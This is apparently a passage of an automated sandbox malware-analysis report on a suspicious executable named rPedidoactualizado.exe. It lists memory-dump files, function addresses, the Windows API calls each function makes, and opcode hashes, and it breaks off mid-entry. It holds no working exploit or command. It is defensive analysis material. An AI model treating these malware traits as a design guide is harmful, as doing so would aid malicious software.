Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D

Function 004053D2 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004053E2

Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68

Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD

Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98

Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674

Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4

Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
